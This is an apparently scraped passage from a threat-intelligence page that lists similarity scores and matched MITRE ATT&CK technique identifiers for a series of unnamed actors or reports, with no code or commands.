- T1021.002 - SMB/Windows Admin Shares
- T1071.003 - Mail Protocols
- T1112 - Modify Registry
- T1505.003 - Web Shell
- T1003.001 - LSASS Memory
- T1589.002 - Email Addresses
- T1059 - Command and Scripting Interpreter
- T1102 - Web Service
- T1218.005 - Mshta
- T1583.006 - Web Services
- T1041 - Exfiltration Over C2 Channel
- T1059.001 - PowerShell
- T1547.001 - Registry Run Keys / Startup Folder
- T1588.002 - Tool
- T1218.010 - Regsvr32
- T1036.003 - Rename Legitimate Utilities
- T1203 - Exploitation for Client Execution
- T1570 - Lateral Tool Transfer
- T1012 - Query Registry
- T1059.003 - Windows Command Shell
- T1027.010 - Command Obfuscation
- T1070.004 - File Deletion
- T1189 - Drive-by Compromise
- T1071.001 - Web Protocols
- T1059.005 - Visual Basic
- T1105 - Ingress Tool Transfer
- T1569.002 - Service Execution
- T1048.003 - Exfiltration Over Unencrypted Non-C2 Protocol
MITREへのリンク →
Score: 41.80
Matched TTPs:
- T1053.005 - Scheduled Task
- T1560.001 - Archive via Utility
- T1190 - Exploit Public-Facing Application
- T1021.002 - SMB/Windows Admin Shares
- T1505.003 - Web Shell
- T1003.001 - LSASS Memory
- T1546.008 - Accessibility Features
- T1090 - Proxy
- T1059 - Command and Scripting Interpreter
- T1102 - Web Service
- T1552.001 - Credentials In Files
- T1059.001 - PowerShell
- T1210 - Exploitation of Remote Services
- T1039 - Data from Network Shared Drive
- T1078 - Valid Accounts
- T1012 - Query Registry
- T1059.003 - Windows Command Shell
- T1027.010 - Command Obfuscation
- T1105 - Ingress Tool Transfer
- T1021.001 - Remote Desktop Protocol
- T1213.005 - Messaging Applications
MITREへのリンク →
Score: 32.39
Matched TTPs:
- T1053.005 - Scheduled Task
- T1560.001 - Archive via Utility
- T1003.004 - LSA Secrets
- T1204.002 - Malicious File
- T1566.002 - Spearphishing Link
- T1566.001 - Spearphishing Attachment
- T1040 - Network Sniffing
- T1555 - Credentials from Password Stores
- T1555.003 - Credentials from Web Browsers
- T1003.001 - LSASS Memory
- T1552.001 - Credentials In Files
- T1059.001 - PowerShell
- T1547.001 - Registry Run Keys / Startup Folder
- T1588.002 - Tool
- T1078 - Valid Accounts
- T1203 - Exploitation for Client Execution
- T1071.001 - Web Protocols
- T1059.005 - Visual Basic
- T1105 - Ingress Tool Transfer
- T1048.003 - Exfiltration Over Unencrypted Non-C2 Protocol
MITREへのリンク →
Score: 96.22
Matched TTPs:
- T1053.005 - Scheduled Task
- T1047 - Windows Management Instrumentation
- T1113 - Screen Capture
- T1033 - System Owner/User Discovery
- T1056.001 - Keylogging
- T1025 - Data from Removable Media
- T1003.004 - LSA Secrets
- T1587.001 - Malware
- T1204.002 - Malicious File
- T1543.003 - Windows Service
- T1497.001 - System Checks
- T1566.002 - Spearphishing Link
- T1566.001 - Spearphishing Attachment
- T1007 - System Service Discovery
- T1556.002 - Password Filter DLL
- T1140 - Deobfuscate/Decode Files or Information
- T1608.001 - Upload Malware
- T1195 - Supply Chain Compromise
- T1555 - Credentials from Password Stores
- T1219 - Remote Access Tools
- T1036 - Masquerading
- T1562.004 - Disable or Modify System Firewall
- T1112 - Modify Registry
- T1555.003 - Credentials from Web Browsers
- T1505.003 - Web Shell
- T1003.001 - LSASS Memory
- T1059 - Command and Scripting Interpreter
- T1552.001 - Credentials In Files
- T1057 - Process Discovery
- T1059.001 - PowerShell
- T1588.002 - Tool
- T1218.001 - Compiled HTML File
- T1078 - Valid Accounts
- T1203 - Exploitation for Client Execution
- T1137.004 - Outlook Home Page
- T1012 - Query Registry
- T1078.002 - Domain Accounts
- T1059.003 - Windows Command Shell
- T1555.004 - Windows Credential Manager
- T1070.004 - File Deletion
- T1071.001 - Web Protocols
- T1059.005 - Visual Basic
- T1105 - Ingress Tool Transfer
- T1021.001 - Remote Desktop Protocol
- T1566.003 - Spearphishing via Service
- T1048.003 - Exfiltration Over Unencrypted Non-C2 Protocol
MITREへのリンク →
Score: 68.68
Matched TTPs:
- T1053.005 - Scheduled Task
- T1033 - System Owner/User Discovery
- T1218.011 - Rundll32
- T1056.001 - Keylogging
- T1548.002 - Bypass User Account Control
- T1204.002 - Malicious File
- T1543.003 - Windows Service
- T1566.001 - Spearphishing Attachment
- T1218.007 - Msiexec
- T1106 - Native API
- T1140 - Deobfuscate/Decode Files or Information
- T1055 - Process Injection
- T1480.002 - Mutual Exclusion
- T1562.004 - Disable or Modify System Firewall
- T1112 - Modify Registry
- T1505.003 - Web Shell
- T1553.005 - Mark-of-the-Web Bypass
- T1218.005 - Mshta
- T1057 - Process Discovery
- T1059.001 - PowerShell
- T1588.002 - Tool
- T1218.001 - Compiled HTML File
- T1562.001 - Disable or Modify Tools
- T1486 - Data Encrypted for Impact
- T1036.003 - Rename Legitimate Utilities
- T1518.001 - Security Software Discovery
- T1059.003 - Windows Command Shell
- T1070.004 - File Deletion
- T1189 - Drive-by Compromise
- T1071.001 - Web Protocols
- T1059.005 - Visual Basic
- T1105 - Ingress Tool Transfer
- T1569.002 - Service Execution
- T1529 - System Shutdown/Reboot
MITREへのリンク →
Score: 42.27
Matched TTPs:
- T1053.005 - Scheduled Task
- T1560.001 - Archive via Utility
- T1047 - Windows Management Instrumentation
- T1056.001 - Keylogging
- T1003.002 - Security Account Manager
- T1003.004 - LSA Secrets
- T1204.002 - Malicious File
- T1566.001 - Spearphishing Attachment
- T1574.001 - DLL
- T1106 - Native API
- T1140 - Deobfuscate/Decode Files or Information
- T1190 - Exploit Public-Facing Application
- T1036 - Masquerading
- T1090.002 - External Proxy
- T1059.001 - PowerShell
- T1210 - Exploitation of Remote Services
- T1588.002 - Tool
- T1039 - Data from Network Shared Drive
- T1078 - Valid Accounts
- T1036.003 - Rename Legitimate Utilities
- T1059.003 - Windows Command Shell
- T1070.004 - File Deletion
- T1105 - Ingress Tool Transfer
- T1021.001 - Remote Desktop Protocol
MITREへのリンク →
Score: 8.20
Matched TTPs:
- T1053.005 - Scheduled Task
- T1204.002 - Malicious File
- T1566.001 - Spearphishing Attachment
- T1588.002 - Tool
- T1027 - Obfuscated Files or Information
- T1059.005 - Visual Basic
- T1105 - Ingress Tool Transfer
MITREへのリンク →
Score: 42.54
Matched TTPs:
- T1053.005 - Scheduled Task
- T1047 - Windows Management Instrumentation
- T1204.002 - Malicious File
- T1213.006 - Databases
- T1566.001 - Spearphishing Attachment
- T1555 - Credentials from Password Stores
- T1555.003 - Credentials from Web Browsers
- T1003.001 - LSASS Memory
- T1059 - Command and Scripting Interpreter
- T1102 - Web Service
- T1059.001 - PowerShell
- T1547.001 - Registry Run Keys / Startup Folder
- T1588.002 - Tool
- T1562.001 - Disable or Modify Tools
- T1078 - Valid Accounts
- T1059.003 - Windows Command Shell
- T1027.010 - Command Obfuscation
- T1070.004 - File Deletion
- T1134 - Access Token Manipulation
- T1021.001 - Remote Desktop Protocol
- T1569.002 - Service Execution
- T1566.003 - Spearphishing via Service
- T1048.003 - Exfiltration Over Unencrypted Non-C2 Protocol
MITREへのリンク →
Score: 33.27
Matched TTPs:
- T1053.005 - Scheduled Task
- T1033 - System Owner/User Discovery
- T1539 - Steal Web Session Cookie
- T1587.001 - Malware
- T1566.002 - Spearphishing Link
- T1574.001 - DLL
- T1608.004 - Drive-by Target
- T1091 - Replication Through Removable Media
- T1608.001 - Upload Malware
- T1112 - Modify Registry
- T1588.001 - Malware
- T1608.005 - Link Target
- T1041 - Exfiltration Over C2 Channel
- T1547.001 - Registry Run Keys / Startup Folder
- T1588.002 - Tool
- T1071.001 - Web Protocols
- T1105 - Ingress Tool Transfer
MITREへのリンク →
Score: 125.34
Matched TTPs:
- T1053.005 - Scheduled Task
- T1047 - Windows Management Instrumentation
- T1033 - System Owner/User Discovery
- T1218.011 - Rundll32
- T1027.009 - Embedded Payloads
- T1056.001 - Keylogging
- T1587.001 - Malware
- T1204.002 - Malicious File
- T1543.003 - Windows Service
- T1566.002 - Spearphishing Link
- T1566.001 - Spearphishing Attachment
- T1574.001 - DLL
- T1106 - Native API
- T1202 - Indirect Command Execution
- T1140 - Deobfuscate/Decode Files or Information
- T1218 - System Binary Proxy Execution
- T1620 - Reflective Code Loading
- T1547.009 - Shortcut Modification
- T1010 - Application Window Discovery
- T1021.002 - SMB/Windows Admin Shares
- T1562.004 - Disable or Modify System Firewall
- T1134.002 - Create Process with Token
- T1090.002 - External Proxy
- T1589.002 - Email Addresses
- T1070 - Indicator Removal
- T1218.005 - Mshta
- T1583.006 - Web Services
- T1491.001 - Internal Defacement
- T1057 - Process Discovery
- T1041 - Exfiltration Over C2 Channel
- T1591 - Gather Victim Org Information
- T1059.001 - PowerShell
- T1547.001 - Registry Run Keys / Startup Folder
- T1588.002 - Tool
- T1574.013 - KernelCallbackTable
- T1562.001 - Disable or Modify Tools
- T1078 - Valid Accounts
- T1036.003 - Rename Legitimate Utilities
- T1102.002 - Bidirectional Communication
- T1203 - Exploitation for Client Execution
- T1001.003 - Protocol or Service Impersonation
- T1012 - Query Registry
- T1059.003 - Windows Command Shell
- T1070.004 - File Deletion
- T1189 - Drive-by Compromise
- T1071.001 - Web Protocols
- T1059.005 - Visual Basic
- T1105 - Ingress Tool Transfer
- T1027.007 - Dynamic API Resolution
- T1021.001 - Remote Desktop Protocol
- T1566.003 - Spearphishing via Service
- T1090.001 - Internal Proxy
- T1048.003 - Exfiltration Over Unencrypted Non-C2 Protocol
- T1529 - System Shutdown/Reboot
MITREへのリンク →
Score: 50.49
Matched TTPs:
- T1053.005 - Scheduled Task
- T1560.001 - Archive via Utility
- T1113 - Screen Capture
- T1548.002 - Bypass User Account Control
- T1204.002 - Malicious File
- T1080 - Taint Shared Content
- T1566.001 - Spearphishing Attachment
- T1574.001 - DLL
- T1007 - System Service Discovery
- T1140 - Deobfuscate/Decode Files or Information
- T1036 - Masquerading
- T1003.001 - LSASS Memory
- T1059.001 - PowerShell
- T1547.001 - Registry Run Keys / Startup Folder
- T1588.002 - Tool
- T1562.001 - Disable or Modify Tools
- T1039 - Data from Network Shared Drive
- T1203 - Exploitation for Client Execution
- T1027.003 - Steganography
- T1059.006 - Python
- T1059.003 - Windows Command Shell
- T1070.004 - File Deletion
- T1189 - Drive-by Compromise
- T1071.001 - Web Protocols
- T1059.005 - Visual Basic
- T1518 - Software Discovery
- T1105 - Ingress Tool Transfer
- T1102.001 - Dead Drop Resolver
MITREへのリンク →
Score: 34.94
Matched TTPs:
- T1053.005 - Scheduled Task
- T1113 - Screen Capture
- T1033 - System Owner/User Discovery
- T1114.001 - Local Email Collection
- T1566.001 - Spearphishing Attachment
- T1140 - Deobfuscate/Decode Files or Information
- T1190 - Exploit Public-Facing Application
- T1036 - Masquerading
- T1056.003 - Web Portal Capture
- T1059 - Command and Scripting Interpreter
- T1583.003 - Virtual Private Server
- T1041 - Exfiltration Over C2 Channel
- T1059.001 - PowerShell
- T1584.006 - Web Services
- T1059.003 - Windows Command Shell
- T1189 - Drive-by Compromise
- T1071.001 - Web Protocols
- T1105 - Ingress Tool Transfer
MITREへのリンク →
Score: 59.72
Matched TTPs:
- T1053.005 - Scheduled Task
- T1113 - Screen Capture
- T1033 - System Owner/User Discovery
- T1003.002 - Security Account Manager
- T1003.004 - LSA Secrets
- T1204.002 - Malicious File
- T1598.003 - Spearphishing Link
- T1566.001 - Spearphishing Attachment
- T1608.004 - Drive-by Target
- T1190 - Exploit Public-Facing Application
- T1562.004 - Disable or Modify System Firewall
- T1112 - Modify Registry
- T1505.003 - Web Shell
- T1059 - Command and Scripting Interpreter
- T1583.003 - Virtual Private Server
- T1598.002 - Spearphishing Attachment
- T1059.001 - PowerShell
- T1071.002 - File Transfer Protocols
- T1210 - Exploitation of Remote Services
- T1547.001 - Registry Run Keys / Startup Folder
- T1588.002 - Tool
- T1078 - Valid Accounts
- T1195.002 - Compromise Software Supply Chain
- T1203 - Exploitation for Client Execution
- T1012 - Query Registry
- T1059.006 - Python
- T1059.003 - Windows Command Shell
- T1070.004 - File Deletion
- T1189 - Drive-by Compromise
- T1105 - Ingress Tool Transfer
- T1021.001 - Remote Desktop Protocol
MITREへのリンク →
Score: 87.34
Matched TTPs:
- T1053.005 - Scheduled Task
- T1560.001 - Archive via Utility
- T1047 - Windows Management Instrumentation
- T1113 - Screen Capture
- T1033 - System Owner/User Discovery
- T1218.011 - Rundll32
- T1548.002 - Bypass User Account Control
- T1003.004 - LSA Secrets
- T1559.002 - Dynamic Data Exchange
- T1204.002 - Malicious File
- T1566.002 - Spearphishing Link
- T1566.001 - Spearphishing Attachment
- T1559.001 - Component Object Model
- T1574.001 - DLL
- T1140 - Deobfuscate/Decode Files or Information
- T1190 - Exploit Public-Facing Application
- T1555 - Credentials from Password Stores
- T1219 - Remote Access Tools
- T1218.003 - CMSTP
- T1555.003 - Credentials from Web Browsers
- T1003.001 - LSASS Memory
- T1090.002 - External Proxy
- T1552.001 - Credentials In Files
- T1218.005 - Mshta
- T1583.006 - Web Services
- T1057 - Process Discovery
- T1041 - Exfiltration Over C2 Channel
- T1059.001 - PowerShell
- T1210 - Exploitation of Remote Services
- T1547.001 - Registry Run Keys / Startup Folder
- T1588.002 - Tool
- T1562.001 - Disable or Modify Tools
- T1102.002 - Bidirectional Communication
- T1203 - Exploitation for Client Execution
- T1027.003 - Steganography
- T1027.004 - Compile After Delivery
- T1518.001 - Security Software Discovery
- T1059.006 - Python
- T1059.003 - Windows Command Shell
- T1027.010 - Command Obfuscation
- T1071.001 - Web Protocols
- T1059.005 - Visual Basic
- T1518 - Software Discovery
- T1105 - Ingress Tool Transfer
MITREへのリンク →
Score: 104.24
Matched TTPs:
- T1053.005 - Scheduled Task
- T1047 - Windows Management Instrumentation
- T1113 - Screen Capture
- T1033 - System Owner/User Discovery
- T1218.011 - Rundll32
- T1025 - Data from Removable Media
- T1204.002 - Malicious File
- T1080 - Taint Shared Content
- T1497.001 - System Checks
- T1566.001 - Spearphishing Attachment
- T1559.001 - Component Object Model
- T1106 - Native API
- T1091 - Replication Through Removable Media
- T1140 - Deobfuscate/Decode Files or Information
- T1608.001 - Upload Malware
- T1055 - Process Injection
- T1620 - Reflective Code Loading
- T1112 - Modify Registry
- T1090 - Proxy
- T1583.003 - Virtual Private Server
- T1102 - Web Service
- T1218.005 - Mshta
- T1027.012 - LNK Icon Smuggling
- T1583.006 - Web Services
- T1491.001 - Internal Defacement
- T1057 - Process Discovery
- T1041 - Exfiltration Over C2 Channel
- T1059.001 - PowerShell
- T1102.003 - One-Way Communication
- T1534 - Internal Spearphishing
- T1547.001 - Registry Run Keys / Startup Folder
- T1588.002 - Tool
- T1562.001 - Disable or Modify Tools
- T1001 - Data Obfuscation
- T1039 - Data from Network Shared Drive
- T1027 - Obfuscated Files or Information
- T1102.002 - Bidirectional Communication
- T1012 - Query Registry
- T1027.004 - Compile After Delivery
- T1518.001 - Security Software Discovery
- T1059.003 - Windows Command Shell
- T1027.010 - Command Obfuscation
- T1070.004 - File Deletion
- T1071.001 - Web Protocols
- T1059.005 - Visual Basic
- T1105 - Ingress Tool Transfer
MITREへのリンク →
Score: 136.49
Matched TTPs:
- T1053.005 - Scheduled Task
- T1560.001 - Archive via Utility
- T1113 - Screen Capture
- T1218.011 - Rundll32
- T1056.001 - Keylogging
- T1539 - Steal Web Session Cookie
- T1587.001 - Malware
- T1204.002 - Malicious File
- T1543.003 - Windows Service
- T1566.002 - Spearphishing Link
- T1598.003 - Spearphishing Link
- T1566.001 - Spearphishing Attachment
- T1007 - System Service Discovery
- T1040 - Network Sniffing
- T1140 - Deobfuscate/Decode Files or Information
- T1608.001 - Upload Malware
- T1190 - Exploit Public-Facing Application
- T1055 - Process Injection
- T1620 - Reflective Code Loading
- T1562.004 - Disable or Modify System Firewall
- T1185 - Browser Session Hijacking
- T1071.003 - Mail Protocols
- T1112 - Modify Registry
- T1555.003 - Credentials from Web Browsers
- T1505.003 - Web Shell
- T1583.004 - Server
- T1003.001 - LSASS Memory
- T1589.002 - Email Addresses
- T1552.001 - Credentials In Files
- T1218.005 - Mshta
- T1657 - Financial Theft
- T1027.012 - LNK Icon Smuggling
- T1583.006 - Web Services
- T1057 - Process Discovery
- T1041 - Exfiltration Over C2 Channel
- T1591 - Gather Victim Org Information
- T1059.001 - PowerShell
- T1071.002 - File Transfer Protocols
- T1534 - Internal Spearphishing
- T1547.001 - Registry Run Keys / Startup Folder
- T1588.002 - Tool
- T1566 - Phishing
- T1562.001 - Disable or Modify Tools
- T1027 - Obfuscated Files or Information
- T1218.010 - Regsvr32
- T1102.002 - Bidirectional Communication
- T1012 - Query Registry
- T1656 - Impersonation
- T1518.001 - Security Software Discovery
- T1059.006 - Python
- T1598 - Phishing for Information
- T1059.003 - Windows Command Shell
- T1219.002 - Remote Desktop Software
- T1027.010 - Command Obfuscation
- T1070.004 - File Deletion
- T1071.001 - Web Protocols
- T1059.005 - Visual Basic
- T1105 - Ingress Tool Transfer
- T1021.001 - Remote Desktop Protocol
- T1588.005 - Exploits
- T1102.001 - Dead Drop Resolver
MITREへのリンク →
Score: 22.73
Matched TTPs:
- T1053.005 - Scheduled Task
- T1047 - Windows Management Instrumentation
- T1033 - System Owner/User Discovery
- T1555 - Credentials from Password Stores
- T1555.003 - Credentials from Web Browsers
- T1059 - Command and Scripting Interpreter
- T1057 - Process Discovery
- T1041 - Exfiltration Over C2 Channel
- T1059.001 - PowerShell
- T1012 - Query Registry
- T1555.004 - Windows Credential Manager
- T1071.001 - Web Protocols
MITREへのリンク →
Score: 15.53
Matched TTPs:
- T1053.005 - Scheduled Task
- T1559.002 - Dynamic Data Exchange
- T1204.002 - Malicious File
- T1566.001 - Spearphishing Attachment
- T1608.001 - Upload Malware
- T1588.002 - Tool
- T1573 - Encrypted Channel
- T1203 - Exploitation for Client Execution
- T1071.001 - Web Protocols
- T1105 - Ingress Tool Transfer
MITREへのリンク →
Score: 17.53
Matched TTPs:
- T1053.005 - Scheduled Task
- T1204.002 - Malicious File
- T1566.002 - Spearphishing Link
- T1566.001 - Spearphishing Attachment
- T1218.005 - Mshta
- T1583.006 - Web Services
- T1041 - Exfiltration Over C2 Channel
- T1059.001 - PowerShell
- T1547.001 - Registry Run Keys / Startup Folder
- T1203 - Exploitation for Client Execution
- T1071.001 - Web Protocols
- T1059.005 - Visual Basic
- T1105 - Ingress Tool Transfer
MITREへのリンク →
Score: 47.61
Matched TTPs:
- T1053.005 - Scheduled Task
- T1033 - System Owner/User Discovery
- T1123 - Audio Capture
- T1548.002 - Bypass User Account Control
- T1559.002 - Dynamic Data Exchange
- T1204.002 - Malicious File
- T1566.001 - Spearphishing Attachment
- T1106 - Native API
- T1055 - Process Injection
- T1555.003 - Credentials from Web Browsers
- T1059 - Command and Scripting Interpreter
- T1057 - Process Discovery
- T1547.001 - Registry Run Keys / Startup Folder
- T1027 - Obfuscated Files or Information
- T1102.002 - Bidirectional Communication
- T1203 - Exploitation for Client Execution
- T1027.003 - Steganography
- T1059.006 - Python
- T1059.003 - Windows Command Shell
- T1189 - Drive-by Compromise
- T1071.001 - Web Protocols
- T1059.005 - Visual Basic
- T1105 - Ingress Tool Transfer
- T1529 - System Shutdown/Reboot
MITREへのリンク →
Score: 29.56
Matched TTPs:
- T1560.001 - Archive via Utility
- T1033 - System Owner/User Discovery
- T1218.011 - Rundll32
- T1583.005 - Botnet
- T1190 - Exploit Public-Facing Application
- T1505.003 - Web Shell
- T1003.001 - LSASS Memory
- T1589.002 - Email Addresses
- T1583.003 - Virtual Private Server
- T1584.005 - Botnet
- T1583.006 - Web Services
- T1057 - Process Discovery
- T1059.001 - PowerShell
- T1059.003 - Windows Command Shell
- T1071.001 - Web Protocols
- T1105 - Ingress Tool Transfer
MITREへのリンク →
Score: 7.52
Matched TTPs:
- T1560.001 - Archive via Utility
- T1218.011 - Rundll32
- T1090 - Proxy
- T1059.001 - PowerShell
- T1588.002 - Tool
MITREへのリンク →
Score: 88.82
Matched TTPs:
- T1560.001 - Archive via Utility
- T1047 - Windows Management Instrumentation
- T1113 - Screen Capture
- T1033 - System Owner/User Discovery
- T1056.001 - Keylogging
- T1006 - Direct Volume Access
- T1584.008 - Network Devices
- T1497.001 - System Checks
- T1007 - System Service Discovery
- T1140 - Deobfuscate/Decode Files or Information
- T1190 - Exploit Public-Facing Application
- T1555 - Credentials from Password Stores
- T1552 - Unsecured Credentials
- T1218 - System Binary Proxy Execution
- T1010 - Application Window Discovery
- T1112 - Modify Registry
- T1555.003 - Credentials from Web Browsers
- T1505.003 - Web Shell
- T1552.004 - Private Keys
- T1003.001 - LSASS Memory
- T1589.002 - Email Addresses
- T1090 - Proxy
- T1584.005 - Botnet
- T1057 - Process Discovery
- T1591 - Gather Victim Org Information
- T1059.001 - PowerShell
- T1588.002 - Tool
- T1078 - Valid Accounts
- T1587.004 - Exploits
- T1570 - Lateral Tool Transfer
- T1012 - Query Registry
- T1078.002 - Domain Accounts
- T1059.003 - Windows Command Shell
- T1070.004 - File Deletion
- T1518 - Software Discovery
- T1105 - Ingress Tool Transfer
- T1021.001 - Remote Desktop Protocol
- T1090.001 - Internal Proxy
MITREへのリンク →
Score: 18.62
Matched TTPs:
- T1560.001 - Archive via Utility
- T1114.001 - Local Email Collection
- T1566.002 - Spearphishing Link
- T1566.001 - Spearphishing Attachment
- T1007 - System Service Discovery
- T1003.001 - LSASS Memory
- T1588.001 - Malware
- T1057 - Process Discovery
- T1588.002 - Tool
- T1059.003 - Windows Command Shell
- T1021.001 - Remote Desktop Protocol
MITREへのリンク →
Score: 30.77
Matched TTPs:
- T1560.001 - Archive via Utility
- T1587.001 - Malware
- T1190 - Exploit Public-Facing Application
- T1021.002 - SMB/Windows Admin Shares
- T1003.001 - LSASS Memory
- T1657 - Financial Theft
- T1057 - Process Discovery
- T1059.001 - PowerShell
- T1048 - Exfiltration Over Alternative Protocol
- T1588.002 - Tool
- T1562.001 - Disable or Modify Tools
- T1078 - Valid Accounts
- T1078.002 - Domain Accounts
- T1518.001 - Security Software Discovery
- T1059.003 - Windows Command Shell
- T1027.010 - Command Obfuscation
- T1070.004 - File Deletion
- T1105 - Ingress Tool Transfer
MITREへのリンク →
Score: 9.09
Matched TTPs:
- T1560.001 - Archive via Utility
- T1559.002 - Dynamic Data Exchange
- T1204.002 - Malicious File
- T1566.001 - Spearphishing Attachment
- T1059.001 - PowerShell
- T1027 - Obfuscated Files or Information
MITREへのリンク →
Score: 34.10
Matched TTPs:
- T1560.001 - Archive via Utility
- T1583.002 - DNS Server
- T1114.001 - Local Email Collection
- T1213.006 - Databases
- T1190 - Exploit Public-Facing Application
- T1564.011 - Ignore Process Interrupts
- T1505.003 - Web Shell
- T1583.003 - Virtual Private Server
- T1588.002 - Tool
- T1566 - Phishing
- T1078 - Valid Accounts
- T1203 - Exploitation for Client Execution
- T1027.004 - Compile After Delivery
- T1071.001 - Web Protocols
MITREへのリンク →
Score: 33.47
Matched TTPs:
- T1560.001 - Archive via Utility
- T1056.001 - Keylogging
- T1003.002 - Security Account Manager
- T1583.005 - Botnet
- T1190 - Exploit Public-Facing Application
- T1055 - Process Injection
- T1505.003 - Web Shell
- T1003.001 - LSASS Memory
- T1070 - Indicator Removal
- T1057 - Process Discovery
- T1554 - Compromise Host Software Binary
- T1059.001 - PowerShell
- T1078.002 - Domain Accounts
- T1059.003 - Windows Command Shell
- T1070.004 - File Deletion
- T1021.001 - Remote Desktop Protocol
MITREへのリンク →
Score: 25.47
Matched TTPs:
- T1560.001 - Archive via Utility
- T1003.002 - Security Account Manager
- T1543.003 - Windows Service
- T1140 - Deobfuscate/Decode Files or Information
- T1190 - Exploit Public-Facing Application
- T1036 - Masquerading
- T1505.003 - Web Shell
- T1003.001 - LSASS Memory
- T1041 - Exfiltration Over C2 Channel
- T1562.001 - Disable or Modify Tools
- T1570 - Lateral Tool Transfer
- T1078.002 - Domain Accounts
- T1059.003 - Windows Command Shell
- T1021.001 - Remote Desktop Protocol
MITREへのリンク →
Score: 96.39
Matched TTPs:
- T1560.001 - Archive via Utility
- T1113 - Screen Capture
- T1218.011 - Rundll32
- T1056.001 - Keylogging
- T1003 - OS Credential Dumping
- T1584.008 - Network Devices
- T1025 - Data from Removable Media
- T1559.002 - Dynamic Data Exchange
- T1204.002 - Malicious File
- T1598.003 - Spearphishing Link
- T1566.001 - Spearphishing Attachment
- T1040 - Network Sniffing
- T1091 - Replication Through Removable Media
- T1140 - Deobfuscate/Decode Files or Information
- T1190 - Exploit Public-Facing Application
- T1036 - Masquerading
- T1021.002 - SMB/Windows Admin Shares
- T1071.003 - Mail Protocols
- T1505.003 - Web Shell
- T1003.001 - LSASS Memory
- T1090.002 - External Proxy
- T1583.003 - Virtual Private Server
- T1583.006 - Web Services
- T1057 - Process Discovery
- T1591 - Gather Victim Org Information
- T1059.001 - PowerShell
- T1210 - Exploitation of Remote Services
- T1547.001 - Registry Run Keys / Startup Folder
- T1588.002 - Tool
- T1039 - Data from Network Shared Drive
- T1078 - Valid Accounts
- T1546.015 - Component Object Model Hijacking
- T1589.001 - Credentials
- T1102.002 - Bidirectional Communication
- T1203 - Exploitation for Client Execution
- T1598 - Phishing for Information
- T1059.003 - Windows Command Shell
- T1070.004 - File Deletion
- T1189 - Drive-by Compromise
- T1071.001 - Web Protocols
- T1105 - Ingress Tool Transfer
- T1001.001 - Junk Data
- T1211 - Exploitation for Defense Evasion
MITREへのリンク →
Score: 85.52
Matched TTPs:
- T1560.001 - Archive via Utility
- T1546.013 - PowerShell Profile
- T1025 - Data from Removable Media
- T1587.001 - Malware
- T1213.006 - Databases
- T1566.002 - Spearphishing Link
- T1007 - System Service Discovery
- T1106 - Native API
- T1140 - Deobfuscate/Decode Files or Information
- T1055 - Process Injection
- T1021.002 - SMB/Windows Admin Shares
- T1071.003 - Mail Protocols
- T1112 - Modify Registry
- T1134.002 - Create Process with Token
- T1547.004 - Winlogon Helper DLL
- T1090 - Proxy
- T1588.001 - Malware
- T1102 - Web Service
- T1583.006 - Web Services
- T1057 - Process Discovery
- T1059.001 - PowerShell
- T1547.001 - Registry Run Keys / Startup Folder
- T1588.002 - Tool
- T1562.001 - Disable or Modify Tools
- T1584.006 - Web Services
- T1102.002 - Bidirectional Communication
- T1570 - Lateral Tool Transfer
- T1012 - Query Registry
- T1518.001 - Security Software Discovery
- T1059.006 - Python
- T1059.003 - Windows Command Shell
- T1555.004 - Windows Credential Manager
- T1027.010 - Command Obfuscation
- T1189 - Drive-by Compromise
- T1071.001 - Web Protocols
- T1059.005 - Visual Basic
- T1105 - Ingress Tool Transfer
- T1090.001 - Internal Proxy
MITREへのリンク →
Score: 10.11
Matched TTPs:
- T1560.001 - Archive via Utility
- T1056.001 - Keylogging
- T1003 - OS Credential Dumping
- T1039 - Data from Network Shared Drive
- T1059.003 - Windows Command Shell
MITREへのリンク →
Score: 60.20
Matched TTPs:
- T1560.001 - Archive via Utility
- T1218.011 - Rundll32
- T1587.001 - Malware
- T1040 - Network Sniffing
- T1190 - Exploit Public-Facing Application
- T1564.011 - Ignore Process Interrupts
- T1562.004 - Disable or Modify System Firewall
- T1681 - Search Threat Vendor Data
- T1003.001 - LSASS Memory
- T1548 - Abuse Elevation Control Mechanism
- T1588.001 - Malware
- T1057 - Process Discovery
- T1554 - Compromise Host Software Binary
- T1059.001 - PowerShell
- T1212 - Exploitation for Credential Access
- T1562.001 - Disable or Modify Tools
- T1078 - Valid Accounts
- T1587.004 - Exploits
- T1203 - Exploitation for Client Execution
- T1570 - Lateral Tool Transfer
- T1059.006 - Python
- T1059.003 - Windows Command Shell
- T1059.012 - Hypervisor CLI
- T1070.004 - File Deletion
MITREへのリンク →
Score: 47.90
Matched TTPs:
- T1560.001 - Archive via Utility
- T1033 - System Owner/User Discovery
- T1056.001 - Keylogging
- T1003.002 - Security Account Manager
- T1003.004 - LSA Secrets
- T1587.001 - Malware
- T1543.003 - Windows Service
- T1583.005 - Botnet
- T1007 - System Service Discovery
- T1140 - Deobfuscate/Decode Files or Information
- T1190 - Exploit Public-Facing Application
- T1021.002 - SMB/Windows Admin Shares
- T1003.001 - LSASS Memory
- T1059 - Command and Scripting Interpreter
- T1057 - Process Discovery
- T1041 - Exfiltration Over C2 Channel
- T1547.001 - Registry Run Keys / Startup Folder
- T1588.002 - Tool
- T1078 - Valid Accounts
- T1027 - Obfuscated Files or Information
- T1614.001 - System Language Discovery
- T1059.003 - Windows Command Shell
- T1071.001 - Web Protocols
- T1105 - Ingress Tool Transfer
- T1569.002 - Service Execution
MITREへのリンク →
Score: 19.79
Matched TTPs:
- T1560.001 - Archive via Utility
- T1047 - Windows Management Instrumentation
- T1539 - Steal Web Session Cookie
- T1543.003 - Windows Service
- T1112 - Modify Registry
- T1588.002 - Tool
- T1012 - Query Registry
- T1134 - Access Token Manipulation
- T1090.001 - Internal Proxy
MITREへのリンク →
Score: 42.47
Matched TTPs:
- T1560.001 - Archive via Utility
- T1047 - Windows Management Instrumentation
- T1033 - System Owner/User Discovery
- T1218.011 - Rundll32
- T1543.003 - Windows Service
- T1574.001 - DLL
- T1007 - System Service Discovery
- T1021.002 - SMB/Windows Admin Shares
- T1021 - Remote Services
- T1112 - Modify Registry
- T1003.001 - LSASS Memory
- T1087 - Account Discovery
- T1588.001 - Malware
- T1059.001 - PowerShell
- T1588.002 - Tool
- T1562.001 - Disable or Modify Tools
- T1078.002 - Domain Accounts
- T1518.001 - Security Software Discovery
- T1059.003 - Windows Command Shell
- T1027.010 - Command Obfuscation
- T1070.004 - File Deletion
- T1105 - Ingress Tool Transfer
- T1021.001 - Remote Desktop Protocol
MITREへのリンク →
Score: 28.81
Matched TTPs:
- T1560.001 - Archive via Utility
- T1047 - Windows Management Instrumentation
- T1190 - Exploit Public-Facing Application
- T1219 - Remote Access Tools
